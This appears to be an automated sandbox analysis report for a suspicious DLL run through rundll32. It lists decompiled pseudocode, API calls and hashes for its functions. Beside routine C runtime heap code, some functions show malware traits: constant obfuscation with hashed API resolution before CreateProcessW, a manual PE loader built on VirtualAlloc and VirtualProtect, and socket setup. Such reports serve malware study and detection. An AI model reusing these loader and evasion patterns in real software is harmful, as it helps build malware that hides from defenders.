LeaveCriticalSection.KERNEL32(?,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B4C
GlobalLock.KERNEL32 ref: 10013B58
_memset.LIBCMT ref: 10013B71
LeaveCriticalSection.KERNEL32(?), ref: 10013B9D

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
Instruction ID: d2dedea389880cd6532a8cc41d1f31ca5a81082a511f3f96b23d25218acb7329
Opcode Fuzzy Hash: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
Instruction Fuzzy Hash: 5F31C1312043129FE720CF34CC8DA2A77E9FF84280B12891DE996C7651EB30F885CB10

Uniqueness

Uniqueness Score: -1.00%

Function 10016380, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E10016380(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x1002f780);
				_t8 = E1001984C(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10019891(_t8);
				}
				if( *0x1005c984 != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x1005ad4c); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E10017D62(_t31);
						 *_t10 = E10017D27(GetLastError());
					}
					goto L9;
				}
				E1001A549(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1001A5C2(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1001A5ED();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E100163D6();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

APIs

__lock.LIBCMT ref: 1001639E

Part of subcall function 1001A549: __mtinitlocknum.LIBCMT ref: 1001A55D
Part of subcall function 1001A549: __amsg_exit.LIBCMT ref: 1001A569
Part of subcall function 1001A549: EnterCriticalSection.KERNEL32(00000001,00000001,?,1001C014,0000000D,1002FA58,00000008,1001C106,00000001,?,?,00000001,?,?,10017AE8,00000001), ref: 1001A571

___sbh_find_block.LIBCMT ref: 100163A9
___sbh_free_block.LIBCMT ref: 100163B8
RtlFreeHeap.NTDLL(00000000,?,1002F780,0000000C,1001BF6A,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562), ref: 100163E8
GetLastError.KERNEL32(?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001,00000001,?,1001C014,0000000D,1002FA58), ref: 100163F9

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
Instruction ID: 632ebcc47bfd7d50c2ae726889ea94072d2ceb4c664f4e9832d4c107bd8c1e1e
Opcode Fuzzy Hash: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
Instruction Fuzzy Hash: EE01D635805326EBEF20DBB4AC0AB9D3BF4EF053A0F214109F554AE091CB34EAC19A64

Uniqueness

Uniqueness Score: -1.00%

Function 04262C24, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E04262C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				intOrPtr _v32;
				void* _t49;
				int _t56;
				WCHAR* _t60;

				_push(_a56);
				_t60 = __ecx;
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E0425FE29(_t49);
				_v32 = 0x534833;
				_v28 = 0;
				_v24 = 0;
				_v8 = 0x70adbe;
				_v8 = _v8 >> 5;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x1d11c356;
				_v8 = _v8 ^ 0x1f145645;
				_v20 = 0xecea8a;
				_v20 = _v20 | 0x5baa72b8;
				_v20 = _v20 ^ 0x5be1d11d;
				_v16 = 0x76217f;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 | 0xe98780dc;
				_v16 = _v16 ^ 0xe98c1e91;
				_v12 = 0xeb975;
				_v12 = _v12 ^ 0xd8138edb;
				_v12 = _v12 | 0x0b4171d5;
				_v12 = _v12 ^ 0xdb5d9300;
				E0424EB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
				return _t56;
			}

0x04262c2c
0x04262c31
0x04262c33
0x04262c36
0x04262c37
0x04262c3a
0x04262c3d
0x04262c3e
0x04262c41
0x04262c44
0x04262c47
0x04262c4a
0x04262c4b
0x04262c4e
0x04262c4f
0x04262c51
0x04262c52
0x04262c57
0x04262c61
0x04262c64
0x04262c67
0x04262c6e
0x04262c72
0x04262c76
0x04262c7d
0x04262c84
0x04262c8b
0x04262c92
0x04262c99
0x04262ca0
0x04262ca4
0x04262cab
0x04262cb2
0x04262cb9
0x04262cc0
0x04262cc7
0x04262ce8
0x04262d02
0x04262d09

APIs

CreateProcessW.KERNELBASE(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 04262D02

Strings

3HS, xrefs: 04262C57

Memory Dump Source

Source File: 00000003.00000002.655623941.0000000004241000.00000020.00000001.sdmp, Offset: 04240000, based on PE: true

Associated: 00000003.00000002.655610855.0000000004240000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.655678485.0000000004266000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4240000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 3HS
API String ID: 963392458-330188696
Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction ID: 14cc4c43dde327a31df7cdd955d4bc970bf21fb73503facbc7ba6a9674f25e86
Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction Fuzzy Hash: FF21F272900248BBDF159F96DC0ACDFBFB9EB85704F508188F915A2220C3B59A24DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 100021D0, Relevance: 3.1, APIs: 2, Instructions: 98
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E100021D0(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
				long _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				int _t67;

				_v28 = __ecx;
				if(_a8[2] != 0) {
					if((_a8[3] & 0x02000000) == 0) {
						asm("sbb ecx, ecx");
						_v16 =  ~( ~(_a8[3] & 0x20000000));
						asm("sbb eax, eax");
						_v24 =  ~( ~(_a8[3] & 0x40000000));
						asm("sbb edx, edx");
						_v12 =  ~( ~(_a8[3] & 0x80000000));
						_t39 = _v24 * 8; // 0x10056f20
						_v20 =  *((intOrPtr*)((_v16 << 4) + _t39 + 0x10056f20 + _v12 * 4));
						if((_a8[3] & 0x04000000) != 0) {
							_v20 = _v20 | 0x00000200;
						}
						_t67 = VirtualProtect( *_a8, _a8[2], _v20,  &_v8); // executed
						if(_t67 != 0) {
							return 1;
						} else {
							return 0;
						}
					}
					if( *_a8 == _a8[1] && (_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x30) || _a8[2] %  *(_a4 + 0x30) == 0)) {
						VirtualFree( *_a8, _a8[2], 0x4000); // executed
					}
					return 1;
				}
				return 1;
			}

APIs

VirtualFree.KERNELBASE(00000000,?,00004000,?,10002468,00000001,00000000,?,10002C68,?,?,?,?,10002C68,00000000,00000000), ref: 10002244

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
Instruction ID: def7816fd77fd5aef653724919a03fde70f7e86383ff2ba96e4cf8bb5acc80b5
Opcode Fuzzy Hash: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
Instruction Fuzzy Hash: 5A41B674600109AFEB44CF98C890BA9B7B6FB88350F25C659EC1A9F395C731EE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1001A305, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1001A305(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x1005ad4c = _t6;
				if(_t6 != 0) {
					_t7 = E1001A2AA(__eflags);
					__eflags = _t7 - 3;
					 *0x1005c984 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1001A57A(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x1005ad4c);
							 *0x1005ad4c =  *0x1005ad4c & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,1001796A,00000001,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C), ref: 1001A316
HeapDestroy.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001A34C

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
Instruction ID: 8ebff57b685a6f4636b50d0b354dfd0ee4d70228ae444a146c3f0929ed30e208
Opcode Fuzzy Hash: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
Instruction Fuzzy Hash: 93E06D71A193569EFB10AB308C9972536F4EB46386F104826F911CD4A0F7B0C6C09A01

Uniqueness

Uniqueness Score: -1.00%

Function 10002010, Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10002010(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t76;
				void* _t127;

				_v28 = __ecx;
				_t3 = _a16 + 4; // 0x104e9
				_v20 =  *_t3;
				_t7 =  *_a16 + 0x14; // 0x4a8bb445
				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x10002c17
				_v24 =  *_a16 + _t9;
				_v8 = 0;
				while(1) {
					_t17 =  *_a16 + 6; // 0xe9000001
					if(_v8 >= ( *_t17 & 0x0000ffff)) {
						break;
					}
					if( *(_v24 + 0x10) != 0) {
						_t41 = _v24 + 0x14; // 0x4a8bb445
						_t43 = _v24 + 0x10; // 0x8b118bbc
						if(E10001FE0(_v28, _a8,  *_t41 +  *_t43) != 0) {
							_t47 = _v24 + 0x10; // 0x8b118bbc
							_t50 = _v24 + 0xc; // 0x4d8b0000
							_t76 = VirtualAlloc(_v20 +  *_t50,  *_t47, 0x1000, 4); // executed
							_v12 = _t76;
							if(_v12 != 0) {
								_t55 = _v24 + 0xc; // 0x4d8b0000
								_v12 = _v20 +  *_t55;
								_t58 = _v24 + 0x10; // 0x8b118bbc
								_t61 = _v24 + 0x14; // 0x4a8bb445
								E10001E60(_v12, _a4 +  *_t61,  *_t58);
								_t127 = _t127 + 0xc;
								 *((intOrPtr*)(_v24 + 8)) = _v12;
								L1:
								_v8 = _v8 + 1;
								_v24 = _v24 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v16 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v16 <= 0) {
						L8:
						goto L1;
					}
					_t28 = _v24 + 0xc; // 0x4d8b0000
					_v12 = VirtualAlloc(_v20 +  *_t28, _v16, 0x1000, 4);
					if(_v12 != 0) {
						_t33 = _v24 + 0xc; // 0x4d8b0000
						_v12 = _v20 +  *_t33;
						 *((intOrPtr*)(_v24 + 8)) = _v12;
						E10001E10(_v12, 0, _v16);
						_t127 = _t127 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,10002BFF,00000000), ref: 10002091
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10008AC6,8B118BBC,?,10002BFF,00000000,10008AC6,?), ref: 1000210C

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
Instruction ID: c265c5d024e1aaa08d03296b5d335ffe068feccc9d90f6e2fd2d76d71ec68577
Opcode Fuzzy Hash: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
Instruction Fuzzy Hash: 4E51DEB4A0020ADFDB04CF94C591AAEB7F1FF48344F208598E915AB355D771EE91CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10008860, Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E10008860(void* __eflags) {
				char* _v8;
				intOrPtr _v12;
				char _v16;
				char* _v20;
				void* __ebp;
				void* _t25;
				void* _t29;
				intOrPtr _t32;
				void* _t33;
				void* _t34;

				_v8 = E1001703B(_t25, _t29, _t33, _t34, 0x5f5e100);
				if(_v8 != 0) {
					_v12 = 0x5f5e100;
					_v16 = 0;
					_v20 = _v8;
					while(1) {
						__eflags = _v16 - 0x5f5e100;
						if(__eflags >= 0) {
							break;
						}
						 *_v20 = _v16;
						_v16 = _v16 + 1;
						_t32 = _v20 + 1;
						__eflags = _t32;
						_v20 = _t32;
					}
					_push(_v8); // executed
					E10016380(_t25, _t33, _t34, __eflags); // executed
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						return 3;
					}
					return 0;
				}
				return 3;
			}

APIs

_malloc.LIBCMT ref: 1000886B

Part of subcall function 1001703B: __FF_MSGBANNER.LIBCMT ref: 1001705E
Part of subcall function 1001703B: __NMSG_WRITE.LIBCMT ref: 10017065
Part of subcall function 1001703B: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001), ref: 100170B3

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
Instruction ID: 9e6909d06ecd8ca97a2f758cde8d66f904c366c92fb4d9c13ba1bad92c8ee0bf
Opcode Fuzzy Hash: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
Instruction Fuzzy Hash: 9A0178B4D0424CEFEB00CFA4C8446AEBBB4FB04354F60C8A9D9516B349E735AB00DB81

Uniqueness

Uniqueness Score: -1.00%

Function 0425D11A, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0425D11A() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t39;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x78f5c7;
				_v32 = 0xa12bb9;
				_v28 = 0x4eca09;
				_v8 = 0x8b256f;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x4a7d0011;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00073d60;
				_v20 = 0x1e549a;
				_v20 = _v20 + 0xffffad33;
				_v20 = _v20 ^ 0x00134b4f;
				_v16 = 0x8dd9dd;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x0460bc3c;
				_v12 = 0x358059;
				_v12 = _v12 + 0xb97b;
				_v12 = _v12 ^ 0x003502df;
				E0424EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
				ExitProcess(0);
			}

0x0425d120
0x0425d124
0x0425d12b
0x0425d132
0x0425d139
0x0425d140
0x0425d144
0x0425d14b
0x0425d14f
0x0425d156
0x0425d15d
0x0425d164
0x0425d16b
0x0425d172
0x0425d176
0x0425d17d
0x0425d184
0x0425d18b
0x0425d1ac
0x0425d1b6

APIs

ExitProcess.KERNEL32(00000000), ref: 0425D1B6

Memory Dump Source

Source File: 00000003.00000002.655623941.0000000004241000.00000020.00000001.sdmp, Offset: 04240000, based on PE: true

Associated: 00000003.00000002.655610855.0000000004240000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.655678485.0000000004266000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4240000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: 090904612c865d47915413384f72db1dc4147fcae1ffeb3f2de7959723771a8a
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: 1F11D0B1C4430DEBDB54DFE5D94A69EBBB0FB00749F108588D521B6250D3B89A489F91

Uniqueness

Uniqueness Score: -1.00%

Function 0426061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0426061D(signed int __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0425FE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E0424EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x04260624
0x04260627
0x04260629
0x0426062c
0x0426062f
0x04260630
0x04260631
0x04260636
0x0426063d
0x04260644
0x0426064b
0x0426064f
0x04260667
0x0426066a
0x04260671
0x04260678
0x0426067f
0x0426068b
0x0426068e
0x04260695
0x0426069c
0x042606a3
0x042606aa
0x042606b1
0x042606b8
0x042606bf
0x042606c6
0x042606d9
0x042606e5
0x042606eb

APIs

lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 042606E5

Memory Dump Source

Source File: 00000003.00000002.655623941.0000000004241000.00000020.00000001.sdmp, Offset: 04240000, based on PE: true

Associated: 00000003.00000002.655610855.0000000004240000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.655678485.0000000004266000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4240000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: 98c7e9acaa0fed2ccf1816f16b289417657cf326d763d26cc49f60dd0809d567
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: 462133B1C00309ABCF04DFA8D9499DEBFB5FB10354F108198E429A2251D3B49B00CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 100011C0, Relevance: 10.6, APIs: 7, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 100011F1
_memset.LIBCMT ref: 10001205
htonl.WS2_32(00000000), ref: 1000121B
htons.WS2_32(?), ref: 1000122F
socket.WS2_32(00000002,00000002,00000000), ref: 10001245
bind.WS2_32(?,?,00000010), ref: 1000126A
setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 100012AC

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
String ID:
API String ID: 1003240404-0
Opcode ID: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
Instruction ID: 88ed1bb05716eef25c8d7e89d15ea7d56457a166ccc4c5acc9453768105f33a4
Opcode Fuzzy Hash: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
Instruction Fuzzy Hash: 1C215974A01228AFE760DF60CC85BD9B7B4EF49714F1081D8E949AB381CB71A9C2DF51

Uniqueness

Uniqueness Score: -1.00%

Function 10008B90, Relevance: 9.1, APIs: 6, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10008B90(intOrPtr __ecx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				struct HDC__* _v120;
				char _v124;
				int _v128;
				int _v132;
				int _v136;
				struct HICON__* _v140;
				intOrPtr _v144;
				void* __ebp;
				signed int _t37;
				int _t40;
				void* _t41;
				void* _t66;
				struct tagRECT* _t82;
				void* _t84;
				void* _t85;
				signed int _t86;

				_t37 =  *0x10057a08; // 0xcbf72908
				_v32 = _t37 ^ _t86;
				_v144 = __ecx;
				_t40 = IsIconic( *(_v144 + 0x20));
				_t87 = _t40;
				if(_t40 == 0) {
					_t41 = E1000C473(_t66, _v144, _t84, _t85, __eflags);
				} else {
					_push(_v144);
					E10013247(_t66,  &_v124, _t84, _t85, _t87);
					_t88 =  &_v124;
					if( &_v124 != 0) {
						_v136 = _v120;
					} else {
						_v136 = 0;
					}
					SendMessageA( *(_v144 + 0x20), 0x27, _v136, 0);
					_v128 = GetSystemMetrics(0xb);
					_v132 = GetSystemMetrics(0xc);
					_t82 =  &_v28;
					GetClientRect( *(_v144 + 0x20), _t82);
					asm("cdq");
					_v12 = _v20 - _v28 - _v128 + 1 - _t82 >> 1;
					asm("cdq");
					_v8 = _v16 - _v24 - _v132 + 1 - _t82 >> 1;
					_v140 =  *((intOrPtr*)(_v144 + 0x188));
					_t79 = _v8;
					DrawIcon(_v120, _v12, _v8, _v140);
					_t41 = E1001329B(_t66,  &_v124, _t84, _t85, _t88);
				}
				return E100167D5(_t41, _t66, _v32 ^ _t86, _t79, _t84, _t85);
			}

APIs

IsIconic.USER32 ref: 10008BB3

Part of subcall function 10013247: __EH_prolog3.LIBCMT ref: 1001324E
Part of subcall function 10013247: BeginPaint.USER32(?,?,00000004,1000C48A,?,00000058,10008C99), ref: 1001327A

SendMessageA.USER32 ref: 10008C01
GetSystemMetrics.USER32 ref: 10008C09
GetSystemMetrics.USER32 ref: 10008C14
GetClientRect.USER32 ref: 10008C2B
